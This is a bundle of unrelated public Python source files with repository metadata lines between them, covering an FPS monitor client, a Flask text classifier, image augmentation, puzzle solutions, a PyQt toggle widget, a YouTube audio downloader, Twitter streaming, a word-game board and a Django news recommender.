            for agent_id in self._agent_ids:
                await self.client._remove_agent(agent_id)
            self.client.stop()
    def start(self, apikey, host):
        """Create the AsyncClient and run it (blocks until stopped)."""
        self.client = AsyncClient(apikey, self._connect_callback, self._state_callback, host)
        self.client.start()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Test frames per second, example application.')
parser.add_argument('-p', required=True, dest='apikey', help='Your embod.ai API key')
parser.add_argument('-a', required=True, dest='agent_ids', nargs='+', help='The id of the agent you want to control')
parser.add_argument('-H', default="wss://api.embod.ai", dest='host', help="The websocket host for the environment")
args = parser.parse_args()
fps = FPSMonitor(args.agent_ids)
fps.start(args.apikey, args.host)
| embod/embod-client | embod_client/example/fps_monitor.py | fps_monitor.py | py | 2,858 | python | en | code | 3 | github-code | 13 |
70102264018 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
import seaborn as sns
from matplotlib import pyplot as plt
import pickle
try:
import emoji
except ImportError:
get_ipython().system('pip install emoji --user')
import emoji
#try:
# from bs4 import BeautifulSoup
#except:
# !pip install bs4 --user
# from bs4 import BeautifulSoup
from tqdm.autonotebook import tqdm
tqdm.pandas()
try:
import nltk
#raise Exception
except:
get_ipython().system('pip install nltk --user')
import nltk
nltk.download('punkt')
#try:
# import textblob
#except:
# !pip install textblob --user
# import textblob
import re
try:
from polyglot.detect import Detector
except ImportError:
#!pip install --user pyicu pycld2
get_ipython().system('pip install polyglot --user')
from polyglot.detect import Detector
try:
from googletrans import Translator
except:
get_ipython().system('pip install googletrans --user')
from googletrans import Translator
# In[ ]:
#nltk.download('wordnet')
from nltk.corpus import wordnet as wn
from nltk.stem.wordnet import WordNetLemmatizer
from nltk import word_tokenize, pos_tag
from collections import defaultdict
import tensorflow
print("tf", tensorflow.__version__)
# In[2]:
from flask import Flask, request, render_template
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
import nltk
from nltk.corpus import stopwords
#nltk.download('stopwords')
#nltk.download('averaged_perceptron_tagger')
import gensim
from gensim.models.doc2vec import TaggedDocument
from tensorflow.keras.models import load_model
# NOTE(review): result of this expression is discarded -- likely notebook
# residue (it neither caches nor assigns the stopword set).
set(stopwords.words('english'))
app = Flask(__name__)
# Preprocessed dataset, doc2vec embedder and Keras classifier loaded once
# at startup.
df = pd.read_pickle("/home/dario/tm-project/data/df_preprocessed_eng_remap.pckle")
doc2vec_model = gensim.models.Doc2Vec.load("model_doc2vec")
#model = load_model("NN_model.h5")
model = load_model("model_new.h5")
def vec_for_learning(model, tagged_docs):
    """Infer one doc2vec vector per TaggedDocument in *tagged_docs*.

    NOTE(review): ``steps=`` was renamed ``epochs=`` in gensim 4 --
    confirm the pinned gensim version.
    """
    #sents = tagged_docs.values
    regressors = [model.infer_vector(doc.words, steps=20) for doc in tqdm(tagged_docs.values)]
    return regressors
def fake_tagged_doc(desc):
    """Wrap a raw description string into a one-element pandas Series of
    TaggedDocument, mimicking the training-time input shape (tag "NaN"
    is a placeholder since the label is unknown at inference time)."""
    arr=np.asarray(desc)
    arr=pd.Series(arr)
    test_tagged = arr.apply( lambda r: TaggedDocument(words=str(r).split(" "), tags=["NaN"]))#, axis=1)
    return test_tagged
# NOTE(review): duplicate import -- emoji is already imported above.
import emoji
def give_emoji_free_text(text):
    """Return *text* with every whitespace-delimited token containing an
    emoji removed.

    NOTE(review): ``str`` is shadowed as a loop variable, and
    ``emoji.UNICODE_EMOJI`` was removed in emoji>=2.0 -- confirm the
    pinned emoji version.
    """
    allchars = [str for str in text]
    emoji_list = [c for c in allchars if c in emoji.UNICODE_EMOJI]
    clean_text = ' '.join([str for str in text.split() if not any(i in str for i in emoji_list)])
    return clean_text
def detect_lang(text):
    """Detect the language of *text* with polyglot.

    Returns the language name when detection is reliable and confident
    (>50), otherwise one of the sentinel strings "low_conf",
    "not_reliable" or "error".
    """
    try:
        lang = Detector(text, quiet=True)
        if lang.reliable:
            return lang.language.name if lang.language.confidence > 50 else "low_conf"
        else:
            return "not_reliable"
    # Detector raises on very short/ambiguous input; ``e`` is unused.
    except Exception as e:
        return "error"
# In[8]:
europ_languages = ["english", 'danish', 'dutch', 'english', 'finnish', 'french', 'german', 'hungarian', 'italian', 'norwegian', 'portuguese', 'russian', 'spanish', 'swedish', 'turkish']
stopwords = set(nltk.corpus.stopwords.words(europ_languages))
tag_map = defaultdict(lambda : wn.NOUN)
tag_map['J'] = wn.ADJ
tag_map['V'] = wn.VERB
tag_map['R'] = wn.ADV
#text = "Another way of achieving this task"
#tokens = word_tokenize(text)
lemmatizer = WordNetLemmatizer()
badwords=[
"www", "http", "https", "th", "pm", "ticket", "org", "event", "link", "registr", "hi", "oil", "en", "lo", "ca",
"month", "monday", "tuesday", "wednesday", "thursday","friday", "saturday", "sunday",
"meetup","meetups", "meet","area","happen", "event", "group", "regist", "pleas", "please", "join", "rsvp", "member", "mask",
"venu", "free", "comment", "thank", "attend", "eventbrit", "mr", "st", "rd", "hour", "mask", "locat", "everyone", "everyon", "contact", "anyone", "great",
"new", "time", "stand", "host", "check", "line", "com", "fee", "cost", "people", "day", "new", "know", "inform", "email", "bring","welcome", "welcom",
"boston", "like", "la", "en", "los", "come", "let", "facebook", "available", "help", "look", "register", "sign","registration", ]
len(badwords), len(set(badwords)) #woops
# In[9]:
def preproc(raw_text, badwords = badwords, lemmatizer = lemmatizer, stopwords = stopwords, tag_map = tag_map):
    """Clean an event description for the doc2vec/classifier pipeline:
    strip URLs and emojis, translate non-English text to English, keep
    alphabetic tokens only, drop stop/noise words, POS-aware lemmatize,
    and return the tokens re-joined by single spaces.

    The module-level helpers are bound as defaults at definition time.
    """
    # Remove URLs.
    text = re.sub(r'''(?i)\b((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:'".,<>?«»“”‘’]))''', " ", raw_text)
    text = give_emoji_free_text(text)
    lang = detect_lang(text)
    if lang != "English":
        # Re-detect to pick the most likely language, then translate.
        langs=Detector(text).languages
        lang=langs[0].name.lower()
        translator= Translator()#from_lang=langs[0].code, to_lang="en")
        text = translator.translate(text).text
    text = text.replace("'s ", " ")
    # Keep alphabetic characters only, lowercase, tokenize on whitespace.
    text = re.sub("[^a-zA-Z]", " ", text).lower().split( ) #.replace("|","").replace("!","").replace("?","")
    text = [token for token in text if all([token not in stopwords, token not in badwords])]
    text = [lemmatizer.lemmatize(token, tag_map[tag[0]]) for token, tag in pos_tag(text)]
    text = [elem for elem in text if elem not in badwords] #badwords after stemming
    return (" ".join(text))
from sklearn.preprocessing import LabelEncoder
# NOTE(review): to_categorical appears unused in this module.
from keras.utils import to_categorical
# Fit the label encoder on the training categories so predicted class
# indices can be mapped back to category names in the POST handler.
lb = LabelEncoder().fit(df.remap_category)
@app.route('/')
def my_form():
    """Serve the empty input form."""
    return render_template('form.html')
@app.route('/', methods=['POST'])
# Default arguments bind the module-level helpers/models at definition time.
def my_form_post(preproc = preproc, fake_tagged_doc=fake_tagged_doc, vec_for_learning = vec_for_learning, model = model, doc2vec_model = doc2vec_model):
    """Classify the submitted description: preprocess, embed with doc2vec,
    predict the category and render it with the model's confidence."""
    text1 = request.form['text1'].lower()
    clean_test=preproc(text1)
    tag_doc=fake_tagged_doc(clean_test)
    desc_vec=vec_for_learning(doc2vec_model, tag_doc)
    # NOTE(review): Sequential.predict_classes() was removed in TF 2.6;
    # newer TF needs np.argmax(model.predict(...), axis=-1).
    predicted_category=model.predict_classes(np.array(desc_vec))
    proba = np.max(model.predict(np.array(desc_vec)))
    return render_template('form.html', final=round(proba, 2), text1=text1, category = lb.inverse_transform(predicted_category))
if __name__ == "__main__":
app.run(debug=True, host="127.0.0.1", port=5002, threaded=True)
| faber6911/meetup-topics | live_demo/app_jupy.py | app_jupy.py | py | 6,370 | python | en | code | 1 | github-code | 13 |
11976084663 | '''
随机裁剪指定大小的区域
'''
import matplotlib.pyplot as plt
from torchvision import transforms
from PIL import Image
img1=Image.open("sunflower.jpg")
img2=transforms.RandomResizedCrop(224)(img1)
img3=transforms.RandomResizedCrop(224)(img1)
img4=transforms.RandomResizedCrop(224)(img1)
plt.subplot(2,2,1),plt.imshow(img1),plt.title("original")
plt.subplot(2,2,2),plt.imshow(img2),plt.title("crop1")
plt.subplot(2,2,3),plt.imshow(img3),plt.title("crop2")
plt.subplot(2,2,4),plt.imshow(img4),plt.title("crop3")
plt.show() | pepperbubble/DL | function_practice/RandomResizedCrop.py | RandomResizedCrop.py | py | 532 | python | ru | code | 0 | github-code | 13 |
70612967697 | N = int(input())
# Read the N weights, sort ascending, then greedily grow SUM = the largest
# value such that every total 1..SUM is reachable; the answer is the first
# gap SUM+1 that the next weight overshoots (smallest non-representable
# subset sum; presumably BOJ 2437 -- confirm against the problem statement).
gram = list(map(int, input().split()))
gram.sort()
if gram[0] != 1:
    # Without a 1, the total 1 itself is unreachable.
    print(1)
else :
    SUM = 1
    for i in range(1, N):
        if gram[i] > SUM+1:
            break
        else:
            SUM+=gram[i]
    print(SUM+1)
| yoonhoohwang/Algorithm | BackJoon/2437. 저울.py | 2437. 저울.py | py | 257 | python | en | code | 2 | github-code | 13 |
36876015669 | #!/usr/bin/env python3
import string
import sys
def parse(data):
    """Puzzle-specific parsing hook; currently the identity function."""
    return data
def readfile(sep="\n"):
try:
f = open("input.txt")
data = f.read().split(sep)
f.close()
except Exception as e:
sys.stderr.write(f"{e}\n")
sys.exit(1)
for line in data:
if line == "":
data.remove(line)
return parse(data)
def parseResult(res):
    """Result post-processing hook; currently the identity function."""
    return res
def solve(data):
    """AoC 2022 day 3 part 2: for each group of three rucksack lines, find
    the badge item common to all three and sum its priority
    (a-z -> 1-26, A-Z -> 27-52)."""
    alphabet = string.ascii_lowercase + string.ascii_uppercase
    # Priority lookup: 'a' -> 1 ... 'Z' -> 52 (replaces the original
    # manual counter loop).
    priority = {letter: i for i, letter in enumerate(alphabet, start=1)}
    res = 0
    for i in range(0, len(data), 3):
        # The original also created an unused ``xs = list()`` here.
        for d in data[i]:
            # First item present in all three rucksacks is the badge.
            if d in priority and d in data[i + 1] and d in data[i + 2]:
                res += priority[d]
                break
    return parseResult(res)
def output(res):
    """Write *res* to stdout on its own line; always returns 0."""
    print(res)
    return 0
def main():
    """Read the input file, solve the puzzle and print the answer."""
    output(solve(readfile()))
    return 0
if __name__ == '__main__':
    sys.exit(main())
| rodfer0x80/aoc2022 | src/day_3/part_2.py | part_2.py | py | 1,056 | python | en | code | 0 | github-code | 13 |
11835682715 | from PyQt5.QtCore import (
QEasingCurve,
Qt,
QPropertyAnimation,
QRect,
QPoint,
pyqtProperty,
)
from PyQt5.QtGui import QColor, QPainter
from PyQt5.QtWidgets import QCheckBox
class CustomCheckBox(QCheckBox):
    """A toggle-switch style QCheckBox: a rounded track with an animated
    circle, followed by a text label drawn to the right of the switch."""
    def __init__(
        self,
        text,
        parent=None,
        width=40,
        bg_color="#777",
        circle_color="#DDD",
        circle_color_checked="#DDD",
        active_color="#00BCFF",
        animation_curve=QEasingCurve.OutBounce,
        text_width=250,
        spacing=6,
    ):
        # QCheckBox.__init__(self)
        super().__init__(parent)
        # Fixed geometry: switch track + spacing + label area, 20px high.
        self.setFixedSize(width + text_width + spacing, 20)
        self.setCursor(Qt.PointingHandCursor)
        self.check_box_width = width
        self.spacing = spacing
        self.text_width = text_width
        # COLORS
        self._bg_color = bg_color
        self._circle_color = circle_color
        self._circle_color_checked = circle_color_checked
        self._active_color = active_color
        # Horizontal position of the circle; animated via the Qt property.
        self._position = 3
        self.animation = QPropertyAnimation(self, b"position")
        self.animation.setEasingCurve(animation_curve)
        self.animation.setDuration(500)
        # Re-run the slide animation whenever the checked state changes.
        self.stateChanged.connect(self.setup_animation)
        # set the text
        self.setText(text)
        if parent is not None:
            self.show()
    # Qt property so QPropertyAnimation can drive the circle position.
    @pyqtProperty(float)
    def position(self):
        return self._position
    @position.setter
    def position(self, pos):
        self._position = pos
        self.update()
    # START STOP ANIMATION
    def setup_animation(self, value):
        """Slide the circle to the right end when checked, left when not."""
        self.animation.stop()
        if value:
            self.animation.setEndValue(self.check_box_width - 19)
        else:
            self.animation.setEndValue(4)
        self.animation.start()
    def hitButton(self, pos: QPoint):
        # Make the whole widget rect clickable, not just the native checkbox.
        return self.contentsRect().contains(pos)
    def paintEvent(self, e):
        """Custom-draw the track, the circle and the label text."""
        p = QPainter(self)
        p.setRenderHint(QPainter.Antialiasing)
        # SET PEN
        p.setPen(Qt.NoPen)
        if not self.isChecked():
            p.setBrush(QColor(self._bg_color))
            p.drawRoundedRect(0, 0, self.check_box_width, 20, 10, 10)
            p.setBrush(QColor(self._circle_color))
            p.drawEllipse(int(self._position), 2, 16, 16)
        else:
            p.setBrush(QColor(self._active_color))
            p.drawRoundedRect(0, 0, self.check_box_width, 20, 10, 10)
            p.setBrush(QColor(self._circle_color_checked))
            p.drawEllipse(int(self._position), 2, 16, 16)
        # DRAW TEXT
        text_rect = QRect(
            self.check_box_width + self.spacing, 0, self.text_width, self.height()
        )
        text = self.text()
        font = p.font()
        font.setPixelSize(12)
        p.setFont(font)
        p.setPen(QColor("#FFF"))
        p.drawText(text_rect, Qt.AlignLeft | Qt.AlignVCenter, text)
        p.end()
| Aabdelmoumen/wang_grace | widgets/CustomCheckBox.py | CustomCheckBox.py | py | 2,925 | python | en | code | 0 | github-code | 13 |
29864312887 | import math
import multiprocessing as mp
import requests
from pytube import YouTube # local version -> able to fix things quickly in case youtube changes stuff
def download_audio(video_url, path):
    """Download audio from YouTube video using multiple connections in parallel.

    :param video_url: YouTube video url.
    :param path: Destination path for downloaded audio track.
    """
    stream = YouTube(video_url).streams.get_by_itag(249)  # 249 = <Stream: itag="249" mime_type="audio/webm" abr="50kbps" acodec="opus">
    url = stream.url  # get direct download url
    filesize = stream.filesize
    # split filesize in chunks
    CHUNK_SIZE = 3 * 2 ** 20  # in bytes
    ranges = [[url, i * CHUNK_SIZE, (i + 1) * CHUNK_SIZE - 1] for i in range(math.ceil(filesize / CHUNK_SIZE))]
    ranges[-1][2] = None  # last range must be to the end of file, so it will be marked as None
    chunks = [0 for _ in ranges]  # init list of chunks, indexed by range position
    # BUG FIX: the Pool was never closed/joined, leaking worker processes on
    # every call.  Using it as a context manager tears the workers down once
    # all chunks have been consumed.
    with mp.Pool(min(len(ranges), 64)) as pool:
        # imap_unordered yields chunks as they finish; idx restores order
        for i, chunk_tuple in enumerate(pool.imap_unordered(_download_chunk, enumerate(ranges)), 1):
            idx, chunk = chunk_tuple
            chunks[idx] = chunk
    # write chunks to final file in their original order
    with open(path, 'wb') as outfile:
        for chunk in chunks:
            outfile.write(chunk)
def _download_chunk(args):
    """Download a single chunk.

    :param args: Tuple of (chunk index, (url, start, finish)); start/finish are
        byte offsets, finish=None meaning "to end of file".
    :return: Tuple of chunk index and chunk data.
    """
    idx, (url, start, finish) = args
    # Build the HTTP Range header value: "start-" or "start-finish".
    byte_range = '{}-'.format(start)
    if finish is not None:
        byte_range += str(finish)
    resp = requests.get(url, headers={'Range': 'bytes=' + byte_range})  # actual HTTP get download request
    return idx, resp.content
| cemfi/score-tube | backend/youtube.py | youtube.py | py | 1,858 | python | en | code | 2 | github-code | 13 |
15049024906 | from enum import IntEnum, auto
from typing import Optional
import pandas as pd
import python_lib_for_me as pyl
import tweepy
from tweepy.models import ResultSet
from twitter_app.util import const_util, pandas_util
from twitter_app.util.twitter_api_v1_1.standard import twitter_tweets_util, twitter_users_util
class EnumOfProcTargetItem(IntEnum):
    """Kind of identifier that selects whose tweets to stream (see do_logic)."""
    USER_ID = auto()    # stream tweets of the followees of a user id
    LIST_ID = auto()    # stream tweets of the members of a Twitter list id
    LIST_NAME = auto()  # stream tweets of the members of a list found by name
    FILE_PATH = auto()  # stream tweets of the users listed in a CSV file
def do_logic(
    use_debug_mode: bool,
    api: tweepy.API,
    enum_of_proc_target_item: EnumOfProcTargetItem,
    item: str,
    keyword_of_csv_format: str,
    header_line_num: int = -1,
) -> None:
    """Stream tweets of the users selected by *enum_of_proc_target_item* / *item*.

    :param use_debug_mode: enables debug logging in the helpers.
    :param api: authenticated tweepy API handle.
    :param item: user id, list id, list name or file path, depending on the enum.
    :param keyword_of_csv_format: CSV-formatted keywords used to filter the stream.
    :param header_line_num: header line count of the list-member file (FILE_PATH only).
    """
    clg: Optional[pyl.CustomLogger] = None
    try:
        # Acquire the logger
        clg = pyl.CustomLogger(__name__, use_debug_mode=use_debug_mode)
        clg.log_inf(f"ロジック実行(Twitterツイート配信)を開始します。")
        # Collect the pages of users whose tweets will be streamed
        user_pages: list[ResultSet] = []
        if enum_of_proc_target_item == EnumOfProcTargetItem.USER_ID:
            # Stream tweets of the followees of the given user id
            user_pages = twitter_users_util.get_followee_pages(
                use_debug_mode,
                api,
                user_id=item,
                num_of_data=twitter_tweets_util.EnumOfStream.MAX_NUM_OF_FOLLOWING.value,
            )
        elif enum_of_proc_target_item == EnumOfProcTargetItem.LIST_ID:
            # Stream tweets of the members of the given list id
            user_pages = twitter_users_util.get_list_member_pages(use_debug_mode, api, list_id=item)
        elif enum_of_proc_target_item == EnumOfProcTargetItem.LIST_NAME:
            # Stream tweets of the members of the list with the given name
            lists: ResultSet = twitter_users_util.get_lists(use_debug_mode, api)
            for list_ in lists:
                if list_.name == item:
                    user_pages = twitter_users_util.get_list_member_pages(use_debug_mode, api, list_id=list_.id)
                    break
        elif enum_of_proc_target_item == EnumOfProcTargetItem.FILE_PATH:
            # Stream tweets of the users listed in the given file
            list_member_df: pd.DataFrame = pandas_util.read_list_member_file(use_debug_mode, item, header_line_num)
            user_ids: list[str] = [
                str(list_member[const_util.LIST_MEMBER_HEADER[0]]) for _, list_member in list_member_df.iterrows()
            ]
            user_pages = twitter_users_util.lookup_users(use_debug_mode, api, user_ids)
        # Flatten the pages into the list of user ids to follow
        following_user_ids: list[str] = [user.id for users_by_page in user_pages for user in users_by_page]
        if len(following_user_ids) > 0:
            clg.log_inf(f"配信対象:{len(following_user_ids)}人")
        else:
            raise (pyl.CustomError(f"フォローユーザが存在しません。"))
        # Build the keyword list from the CSV-formatted string
        keywords: list[str] = pyl.generate_str_list_from_csv(keyword_of_csv_format)
        # Start streaming the tweets (blocks until the stream ends)
        twitter_tweets_util.stream_tweets(use_debug_mode, api, following_user_ids, keywords)
    except Exception as e:
        raise (e)
    finally:
        if clg is not None:
            clg.log_inf(f"ロジック実行(Twitterツイート配信)を終了します。")
    return None
| silverag-corgi/twitter-app | src/twitter_app/logic/twitter_tweet_stream.py | twitter_tweet_stream.py | py | 3,511 | python | ja | code | 0 | github-code | 13 |
31943752910 | from typing import List
# @lc code=start
class Solution:
    def largestTriangleArea(self, points: List[List[int]]) -> float:
        """Return the largest area of any triangle formed by three of the points.

        Brute-forces all C(n, 3) triples and evaluates each area with the
        shoelace (cross-product) formula.
        """
        best = 0
        total = len(points)
        for i in range(total):
            x1, y1 = points[i]
            for j in range(i + 1, total):
                x2, y2 = points[j]
                for k in range(j + 1, total):
                    x3, y3 = points[k]
                    # twice the signed area, via the cross product
                    cross = x1 * (y2 - y3) + x2 * (y3 - y1) + x3 * (y1 - y2)
                    best = max(best, abs(cross) / 2)
        return best
# @lc code=end
| wylu/leetcodecn | src/python/p800to899/812.最大三角形面积.py | 812.最大三角形面积.py | py | 642 | python | en | code | 3 | github-code | 13 |
5185661086 | import sqlite3
import pymorphy2
import random
from PyQt5.QtGui import QColor, QPainter
def get_x(x, offset, hor):
if hor:
return x + offset
else:
return x
def get_y(y, offset, hor):
if hor:
return y
else:
return y + offset
class Board:
    """State of a 16x16 word-game board: letter bag, grid, boosters and scoring.

    Letters and their point values come from the sqlite DB ``res/letters.db``;
    booster cells come from ``res/boosters.txt``.  ``log`` is a callable used
    to report validation messages to the UI.
    """
    def __init__(self, log):
        self.let_con = sqlite3.connect('res/letters.db')
        self.morph = pymorphy2.MorphAnalyzer()  # used to validate words as noun lemmas
        self.words = []       # words already played this game
        self.log = log
        self.boosters = {}    # (x, y) -> booster code (see legend above point_boost)
        with open('res/boosters.txt') as f:
            for i, line in enumerate(f.readlines()):
                for j, boost in enumerate(line.split()):
                    # NOTE(review): `boost` is a str here, so `boost != 0` is
                    # always True and '0' cells are stored too; harmless since
                    # lookups default to 0, but `boost != '0'` was likely meant.
                    if boost != 0:
                        self.boosters[j, i] = int(boost)
    def generate(self):
        """Reset the grid and refill the shuffled letter bag from the DB."""
        self.grid = [[''] * 16 for _ in range(16)]
        self.chips = []
        cur = self.let_con.cursor()
        for i in cur.execute('''SELECT * FROM letters''').fetchall():
            # row layout: (id?, char, count); add `count` copies of each letter
            for j in range(i[2]):
                self.chips.append(i[1])
        self.chips = random.sample(self.chips, len(self.chips))
    def take_chip(self):
        # Draw one letter from the end of the (shuffled) bag.
        return self.chips.pop(-1)
    def next_chips(self):
        """Draw the player's next rack of 7 letters (empty rack if bag is low)."""
        if len(self.chips) < 7:
            self.curr_chips = [''] * 7
        else:
            self.curr_chips = [self.take_chip() for _ in range(7)]
    def update_chips(self, btns):
        """Mirror the current rack onto the rack buttons, with point tooltips."""
        for i, btn in zip(self.curr_chips, btns):
            btn.setText(i)
            if i != '':
                btn.setToolTip(f'Очков за букву: {self.get_letter_value(i)}')
            else:
                btn.setToolTip('')
    def get_letter_value(self, let):
        """Return the point value of letter *let* from the DB (None if unknown)."""
        cur = self.let_con.cursor()
        # NOTE(review): letter interpolated into SQL via f-string; safe only
        # because letters come from the trusted DB/rack, not free user input.
        point = cur.execute(f'''SELECT value FROM letters WHERE char='{let}' ''')
        for j in point:
            return j[0]
    def update_grid(self, btns):
        """Lock committed letters into the board buttons (mark & disable them)."""
        for i, j in zip(self.grid, btns):
            for let, btn in zip(i, j):
                if let != '':
                    btn.stat = True
                    btn.setEnabled(False)
                    btn.setText(let)
    def update_boosters(self, btns):
        """Push each cell's booster code onto its button as the 'boost' property."""
        for i, line in enumerate(btns):
            for j, btn in enumerate(line):
                btn.setProperty('boost', self.boosters.get((i, j), 0))
    def commit_grid(self, btns, chips):
        """Copy the button texts back into the grid and rack state."""
        for i, line in enumerate(btns):
            for j, btn in enumerate(line):
                self.grid[i][j] = btn.text()
        for i, chip in enumerate(chips):
            self.curr_chips[i] = chip.text()
    def raise_chips(self, btns, cursor):
        """Return unplayed rack letters (and the cursor letter) to the bag, reshuffle."""
        for i in btns:
            if i.text() != '':
                self.chips.append(i.text())
                print(i.text())
        if cursor != '':
            self.chips.append(cursor)
            print(cursor)
        self.chips = random.sample(self.chips, len(self.chips))
    def input_word(self, btns, info, fist_word):
        """Validate the word described by *info* = (x, y, length, horizontal?).

        Rules enforced: no gaps, not previously played, must touch an existing
        letter (or the start cell, booster code 5, for the first word), and
        must be a valid dictionary noun.  Returns True when accepted.
        """
        res = ''
        intersect = False
        for i in range(info[2]):
            b = btns[get_x(info[0], i, info[3])][get_y(info[1], i, info[3])]
            # later words must cross a locked cell; the first word must cover
            # the designated start cell (booster code 5)
            if not fist_word and b.stat:
                intersect = True
            if fist_word and self.boosters.get((get_x(info[0], i, info[3]), get_y(info[1], i, info[3])), 0) == 5:
                intersect = True
            let = b.text()
            if let == '':
                self.log('Empty Space')
                return False
            res += let
        if res in self.words:
            self.log('Word already been!!!')
            return False
        self.words.append(res)
        if not intersect:
            self.log('Слово не пересекается с предыдущими.')
            return False
        return self.check_word(res)
    def word_points(self, info):
        """Score the word described by *info*, applying letter and word boosters."""
        res = 0
        cur = self.let_con.cursor()
        post_boost = []  # word-level boosters, applied after the letter sum
        for i in range(info[2]):
            if info[3]:
                res += self.point_boost(info[0] + i, info[1], cur, post_boost)
            else:
                res += self.point_boost(info[0], info[1] + i, cur, post_boost)
        bonus = 0
        for i in post_boost:
            if i == 3:
                bonus += res        # x2 word: add the base sum once more
            if i == 4:
                bonus += res * 2    # x3 word: add the base sum twice more
        print(f'Bonus: {bonus}')
        return res + bonus
    # 1 - x2 for letter
    # 2 - x3 for letter
    # 3 - x2 for word
    # 4 - x3 for word
    # 5 - Cell for first word
    def point_boost(self, x, y, cur, post_boost):
        """Return the (letter-boosted) value of the letter at (x, y).

        Word-level boosters (codes 3/4) are not applied here; they are queued
        into *post_boost* for word_points to apply on the full word sum.
        """
        boost = self.boosters.get((x, y), 0)
        request = cur.execute(f'''SELECT value FROM letters WHERE char='{self.grid[x][y]}' ''')
        for j in request:
            res = j[0]
        print(f'Before boost: {res}')
        if boost == 0:
            print('x1')
            return res
        if boost == 1:
            print('x2')
            return res * 2
        if boost == 2:
            print('x3')
            return res * 3
        if boost == 3 or boost == 4:
            post_boost.append(boost)
            return res
    def close(self):
        # Release the sqlite connection.
        self.let_con.close()
    def check_word(self, word):
        """Accept *word* iff some pymorphy2 parse is a NOUN whose lemma equals it."""
        res = self.morph.parse(word)
        for i in res:
            # print(i)
            # compare against the lemma, with 'ё' normalized to 'е'
            if {'NOUN'} in i.tag and i.normal_form.lower().replace('ё', 'е') == word:
                return True
            else:
                print(f'Incorrect tags: {i}')
                print('--------------')
        return False
| RustyGuard/PyQTProject | Board.py | Board.py | py | 5,386 | python | en | code | 0 | github-code | 13 |
27547071653 | from django.shortcuts import render
from django.http import JsonResponse
import pandas as pd
from django.views.decorators.csrf import csrf_exempt
# Notice: using different gensim version will cause errors
from gensim.models.doc2vec import Doc2Vec
# (1) Load news data--approach 1
# df = pd.read_csv('dataset/cnn_news_newest_10_regional_category_processed.csv',sep='|')
# (2) Load news data--approach 2
def load_df_data_v1():
    """Load the preprocessed news dataset from disk into the module-global df."""
    global df # global variable
    df = pd.read_csv('dataset/ptt_dataset_preprocessed.csv',sep='|')
    print(df)
# (3) Load news data--approach 3
# We can use df from the app_user_keyword
# from app_user_keyword.views import df
# (4) Load news data--approach 4
# import from app_user_keyword.views and use df later
import app_user_keyword.views as userkeyword_views
def load_df_data_v2():
    """Reuse the DataFrame already loaded by the app_user_keyword app."""
    # import and use df from app_user_keyword
    global df # global variable
    df = userkeyword_views.df
# call load data function when starting server
load_df_data_v2()
# Load doc2vec model
def load_doc2vec_model():
    """Load the pre-trained doc2vec model into the module-global `model`."""
    global model # global variable
    model = Doc2Vec.load("dataset/cna_news_doc2vec.model")
# call load model function when starting server
load_doc2vec_model()
# -- home page
def home(request):
    # Render the news-recommendation landing page.
    return render(request, "app_news_rcmd/home.html")
# -- API (three APIs)
# -- API: input category
@csrf_exempt
def api_cate_news(request):
    """POST {category} -> {"latest_news": [up to 5 latest items of that category]}."""
    cate = request.POST['category']
    response = get_cate_latest_news(cate)
    return JsonResponse({"latest_news": response})
# -- API: input keywords, get top 5 similar news
# @csrf_exempt # it is OK, because frontend pass the csrf information
# @csrf_exempt # it is OK, because frontend pass the csrf information
def api_keywords_similar_news(request):
    """POST {tokens: "w1 w2 ..."} -> {"data": 5 most similar news via doc2vec}."""
    keywords = request.POST['tokens']
    keywords = [t for t in keywords.split()]
    response = get_keywords_most_similar(keywords)
    return JsonResponse({"data": response})
# -- API: input news_id, and then get news information
@csrf_exempt
def api_news_content(request):
    """POST {news_id} -> the item's full content plus 3 related items."""
    item_id = request.POST['news_id']
    print(item_id)
    content = get_news_content(item_id)
    related = get_itemid_most_similar(item_id)
    # print(related)
    return JsonResponse({"news_content": content, "related_news": related})
# -- Given a item_id, get document information
def get_news_content(item_id):
    """Return a dict with the fields of the news item identified by *item_id*.

    NOTE(review): the lookup filters on ``df.category == item_id`` — this
    dataset apparently reuses the ``category`` column as the item id; confirm
    against the CSV schema.
    """
    df_item = df[df.category == item_id]
    title = df_item.iloc[0].title
    content = df_item.iloc[0].content
    category = df_item.iloc[0].category
    link = df_item.iloc[0].link
    date = df_item.iloc[0].date
    # photo_link support is currently disabled; if re-enabled, NaN values must
    # be replaced with an empty string:
    #   photo_link = df_item.iloc[0].photo_link
    #   if pd.isna(photo_link):
    #       photo_link = ''
    news_info = {
        "id": item_id,
        "category": category,
        "title": title,
        "content": content,
        "link": link,
        "date": date,
    }
    return news_info
#-- Given a category, get the latest news
def get_cate_latest_news(cate):
    """Return summaries of (up to) the 5 most recent news items in category *cate*.

    Rows are assumed to be in chronological order, so the tail of the frame
    holds the latest items -- TODO confirm the CSV is sorted by date.
    """
    items = []
    df_cate = df[df.category == cate]
    df_cate = df_cate.tail(5)  # only the 5 newest items
    for i in range(len(df_cate)):
        item_id = df_cate.iloc[i].category  # NOTE(review): category doubles as the item id
        print(item_id)
        title = df_cate.iloc[i].title
        content = df_cate.iloc[i].content
        category = df_cate.iloc[i].category
        link = df_cate.iloc[i].link
        # photo_link support disabled; see get_news_content for the intended
        # NaN handling if it is restored.
        item = {
            "id": item_id,
            "category": category,
            "title": title,
            "link": link,
        }
        items.append(item)
    return items
#--Given news keywords, find similar documents
def get_keywords_most_similar(keywords):
    """Return the 5 news items most similar to *keywords* per the doc2vec model.

    :param keywords: list of tokens to embed with model.infer_vector.
    """
    new_vector = model.infer_vector(keywords)
    similar_items = model.docvecs.most_similar(positive=[new_vector], topn=5)
    items = []
    for item_id, score in similar_items:
        df_item = df[df.category == item_id]  # NOTE(review): category doubles as the item id
        title = df_item.iloc[0].title
        content = df_item.iloc[0].content
        category = df_item.iloc[0].category
        link = df_item.iloc[0].link
        # photo_link support disabled; see get_news_content for the intended
        # NaN handling if it is restored.
        score = round(score, 2)
        item = {
            "id": item_id,
            "category": category,
            "title": title,
            "link": link,
            'score': score,
        }
        items.append(item)
    return items
#-- Given item_id, get three similar news based on the doc2vec model
def get_itemid_most_similar(item_id):
